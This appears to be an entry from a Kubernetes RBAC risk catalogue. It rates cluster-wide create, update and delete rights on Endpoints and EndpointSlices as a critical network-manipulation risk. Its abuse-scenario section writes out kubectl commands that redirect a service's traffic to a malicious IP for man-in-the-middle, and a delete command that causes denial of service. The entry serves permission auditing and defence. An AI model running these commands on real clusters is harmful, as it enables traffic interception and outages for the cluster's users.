Manage Endpoints or EndpointSlices cluster-wide
NetworkManipulation
Critical
Overview
| Field | Value |
|---|---|
| ID | 1073 |
| Name | Manage Endpoints or EndpointSlices cluster-wide |
| Risk Category | NetworkManipulation |
| Risk Level | Critical |
| Role Type | ClusterRole |
| API Groups | core, discovery.k8s.io |
| Resources | endpoints, endpointslices |
| Verbs | create, update, patch, delete, get, list |
| Tags | DenialOfService ManInTheMiddle NetworkManipulation Tampering TrafficRedirection |
Description
Allows creating, updating, or deleting Endpoints/EndpointSlices for services across all namespaces. This can be used to redirect traffic intended for legitimate services to malicious pods (Man-in-the-Middle), cause denial of service, or bypass network policies.
Abuse Scenarios
- Create a new Endpoint to redirect traffic for a service to a malicious IP.
kubectl create -n <namespace> -f - <<EOF
apiVersion: v1
kind: Endpoints
metadata:
name: <service-name> # Must match an existing service name
subsets:
- addresses:
- ip: <malicious-ip-address>
ports:
- port: <service-port>
EOF
# Example: kubectl create -n default -f - <<EOF ... EOF (redirect 'kubernetes' service)
- Delete an existing Endpoint, causing service disruption (DoS).
kubectl delete endpoint <endpoint-name> -n <namespace>
# Example: kubectl delete endpoint my-app-service -n production